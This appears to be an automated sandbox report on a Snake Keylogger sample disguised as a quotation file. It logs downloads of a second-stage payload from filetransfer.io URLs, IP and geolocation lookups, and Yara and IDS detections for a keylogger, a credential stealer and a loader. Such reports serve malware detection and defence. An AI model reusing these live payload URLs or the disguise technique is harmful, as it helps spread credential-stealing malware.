Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49979 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49993 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49981 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49983 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49991 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49980 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /data-package/Bh1Kj4RD/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/mOA1FV1QAe83 HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /data-package/Bh1Kj4RD/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: s23.filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50010C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500231000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001B0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50021F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001B0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001FE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5000FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50015A000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50021F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: aspnet_compiler.exe, 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://entityframework-plus.net/
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io/data-package/Bh1Kj4RD/download
Source: aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50012C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500231000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001B0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50021F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_NOVQTRA071244PDF.scr.exe	String found in binary or memory: http://www.zzzprojects.com
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bulk-operations.net
Source: QUOTATION_NOVQTRA071244PDF.scr.exe	String found in binary or memory: https://bulk-operations.net/pricing.
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dapper-plus.net
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
Source: QUOTATION_NOVQTRA071244PDF.scr.exe	String found in binary or memory: https://dapper-plus.net/pricing.
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://entityframework-extensions.net/)
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://entityframework-extensions.net/include-graph).
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://entityframework-extensions.net/md5-exception
Source: QUOTATION_NOVQTRA071244PDF.scr.exe	String found in binary or memory: https://entityframework-extensions.net/pricing.
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7DB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7DB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io/data-package/Bh1Kj4RD/download
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215
Source: QUOTATION_NOVQTRA071244PDF.scr.exe	String found in binary or memory: https://linqtosql-plus.net/pricing.
Source: aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50010C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E500231000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001B0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50015A000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50021F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50010C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: aspnet_compiler.exe, 00000005.00000002.2532886992.000001E5001EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: aspnet_compiler.exe, 00000005.00000002.2532886992.000001E50010C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187p
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7DE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s23.filetransfer.io
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7DE2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7DE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s23.filetransfer.io/storage/download/mOA1FV1QAe83
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7EAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1925145451.00000210C0830000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A7CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49714 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1e56c560000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.aspnet_compiler.exe.1e5100100e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7db2c38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d62c00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.210b7d019b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1914720622.00000210A815E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.2535009068.000001E510009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.2535505906.000001E56C220000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.2536779290.000001E56C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6180, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6180, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_NOVQTRA071244PDF.scr.exe

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1063240	0_2_00007FF7C1063240
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1061B88	0_2_00007FF7C1061B88
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1062093	0_2_00007FF7C1062093
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C106BED3	0_2_00007FF7C106BED3
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1203070	0_2_00007FF7C1203070
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1289A90	0_2_00007FF7C1289A90
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1291AD0	0_2_00007FF7C1291AD0
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C12991B0	0_2_00007FF7C12991B0
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C12929A0	0_2_00007FF7C12929A0
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1282328	0_2_00007FF7C1282328
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C12888A0	0_2_00007FF7C12888A0
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1280188	0_2_00007FF7C1280188
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1289978	0_2_00007FF7C1289978
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1284CF4	0_2_00007FF7C1284CF4
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe	Code function: 0_2_00007FF7C1290BF3	0_2_00007FF7C1290BF3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001E56C242D78	5_2_000001E56C242D78
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001E56C24299C	5_2_000001E56C24299C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001E56C246454	5_2_000001E56C246454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001E56C243C5C	5_2_000001E56C243C5C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001E56C2431A8	5_2_000001E56C2431A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_000001E56C241AC0	5_2_000001E56C241AC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_00007FF7C110692A	5_2_00007FF7C110692A

Source: QUOTATION_NOVQTRA071244PDF.scr.exe

Static PE information: No import functions for PE file found

Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1924301398.00000210C0630000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameHmolaijm.dll" vs QUOTATION_NOVQTRA071244PDF.scr.exe
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B801F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000000.1292288325.00000210A5E82000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDyaamhymr.exeH vs QUOTATION_NOVQTRA071244PDF.scr.exe
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1914720622.00000210A8086000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.1921777459.00000210B7D01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
